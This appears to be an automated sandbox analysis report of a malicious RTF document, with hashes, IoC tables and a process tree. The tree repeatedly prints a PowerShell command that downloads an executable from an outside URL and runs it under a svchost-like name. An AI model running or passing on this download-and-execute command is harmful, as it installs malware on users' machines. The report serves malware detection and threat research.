70ebcc2aa157230051490f5480d49dcef22ad8c26be1307ad8eab63bd4233c40

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
21-09-2024 01:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eedc2afd6e99aa74cb24b9afe046dc68_JaffaCakes118.rtf
Size

675KB
MD5

eedc2afd6e99aa74cb24b9afe046dc68
SHA1

ee028e27c4f1282b2f061e96ae62dddfdd5fb95d
SHA256

70ebcc2aa157230051490f5480d49dcef22ad8c26be1307ad8eab63bd4233c40
SHA512

aa176a42dff8ae0612dd57f681a56d2842c9f14a81efdc59bca854f53b8ced58d3048938a71a909bdb2ad378b9766f89c0ba454dc35ae20e65ce0b7864fdee61
SSDEEP

6144:9YZ/EO/1IDPWCh0FzlAifCjE720Sli19W0L/dU3x1JCUIB8emF:uZV/1a+W9fd+9vLFxUJeu

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://fast-cargo.com/images/file/58.exe

Signatures

Process spawned unexpected child process 10 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4896	212	powershell.exe	87
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	688	4140	powershell.exe	98
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4152	3472	powershell.exe	102
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3728	3336	powershell.exe	107
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1540	5028	powershell.exe	110
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2780	872	powershell.exe	115
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1840	3504	powershell.exe	120
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3256	1708	powershell.exe	123
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4352	3548	powershell.exe	126
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3476	4084	powershell.exe	129

Blocklisted process makes network request 10 IoCs

flow	pid	Process
22	4896	powershell.exe
41	688	powershell.exe
48	4152	powershell.exe
57	3728	powershell.exe
63	1540	powershell.exe
80	2780	powershell.exe
84	1840	powershell.exe
89	3256	powershell.exe
93	4352	powershell.exe
98	3476	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
688	powershell.exe
4152	powershell.exe
2780	powershell.exe
1840	powershell.exe
4352	powershell.exe
3476	powershell.exe
4896	powershell.exe
3728	powershell.exe
1540	powershell.exe
3256	powershell.exe
4152	powershell.exe
2780	powershell.exe
3476	powershell.exe
4896	powershell.exe
688	powershell.exe
3728	powershell.exe
1540	powershell.exe
1840	powershell.exe
3256	powershell.exe
4352	powershell.exe

Checks processor information in registry 2 TTPs 63 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 63 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1428	WINWORD.EXE
1428	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4896	powershell.exe
4896	powershell.exe
688	powershell.exe
688	powershell.exe
688	powershell.exe
4152	powershell.exe
4152	powershell.exe
4152	powershell.exe
3728	powershell.exe
3728	powershell.exe
3728	powershell.exe
1540	powershell.exe
1540	powershell.exe
1540	powershell.exe
2780	powershell.exe
2780	powershell.exe
2780	powershell.exe
1840	powershell.exe
1840	powershell.exe
1840	powershell.exe
3256	powershell.exe
3256	powershell.exe
3256	powershell.exe
4352	powershell.exe
4352	powershell.exe
4352	powershell.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	688	powershell.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	3728	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	3476	powershell.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1428	WINWORD.EXE
1428	WINWORD.EXE
1428	WINWORD.EXE
212	EXCEL.EXE
212	EXCEL.EXE
212	EXCEL.EXE
212	EXCEL.EXE
212	EXCEL.EXE
212	EXCEL.EXE
212	EXCEL.EXE
4140	EXCEL.EXE
4140	EXCEL.EXE
4140	EXCEL.EXE
4140	EXCEL.EXE
4140	EXCEL.EXE
4140	EXCEL.EXE
4140	EXCEL.EXE
3472	EXCEL.EXE
3472	EXCEL.EXE
3472	EXCEL.EXE
3472	EXCEL.EXE
3472	EXCEL.EXE
3472	EXCEL.EXE
3472	EXCEL.EXE
3336	EXCEL.EXE
3336	EXCEL.EXE
3336	EXCEL.EXE
3336	EXCEL.EXE
3336	EXCEL.EXE
3336	EXCEL.EXE
3336	EXCEL.EXE
5028	EXCEL.EXE
5028	EXCEL.EXE
5028	EXCEL.EXE
5028	EXCEL.EXE
5028	EXCEL.EXE
5028	EXCEL.EXE
5028	EXCEL.EXE
872	EXCEL.EXE
872	EXCEL.EXE
872	EXCEL.EXE
872	EXCEL.EXE
872	EXCEL.EXE
872	EXCEL.EXE
872	EXCEL.EXE
3504	EXCEL.EXE
3504	EXCEL.EXE
3504	EXCEL.EXE
3504	EXCEL.EXE
3504	EXCEL.EXE
3504	EXCEL.EXE
3504	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
1708	EXCEL.EXE
3548	EXCEL.EXE
3548	EXCEL.EXE
3548	EXCEL.EXE
3548	EXCEL.EXE
3548	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 212 wrote to memory of 4896	212	EXCEL.EXE	90
PID 212 wrote to memory of 4896	212	EXCEL.EXE	90
PID 4140 wrote to memory of 688	4140	EXCEL.EXE	99
PID 4140 wrote to memory of 688	4140	EXCEL.EXE	99
PID 3472 wrote to memory of 4152	3472	EXCEL.EXE	104
PID 3472 wrote to memory of 4152	3472	EXCEL.EXE	104
PID 3336 wrote to memory of 3728	3336	EXCEL.EXE	108
PID 3336 wrote to memory of 3728	3336	EXCEL.EXE	108
PID 5028 wrote to memory of 1540	5028	EXCEL.EXE	111
PID 5028 wrote to memory of 1540	5028	EXCEL.EXE	111
PID 872 wrote to memory of 2780	872	EXCEL.EXE	117
PID 872 wrote to memory of 2780	872	EXCEL.EXE	117
PID 3504 wrote to memory of 1840	3504	EXCEL.EXE	121
PID 3504 wrote to memory of 1840	3504	EXCEL.EXE	121
PID 1708 wrote to memory of 3256	1708	EXCEL.EXE	124
PID 1708 wrote to memory of 3256	1708	EXCEL.EXE	124
PID 3548 wrote to memory of 4352	3548	EXCEL.EXE	127
PID 3548 wrote to memory of 4352	3548	EXCEL.EXE	127
PID 4084 wrote to memory of 3476	4084	EXCEL.EXE	130
PID 4084 wrote to memory of 3476	4084	EXCEL.EXE	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eedc2afd6e99aa74cb24b9afe046dc68_JaffaCakes118.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1428

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4896

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:688

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4152

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3728

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1540

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2780

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1840

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3256

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
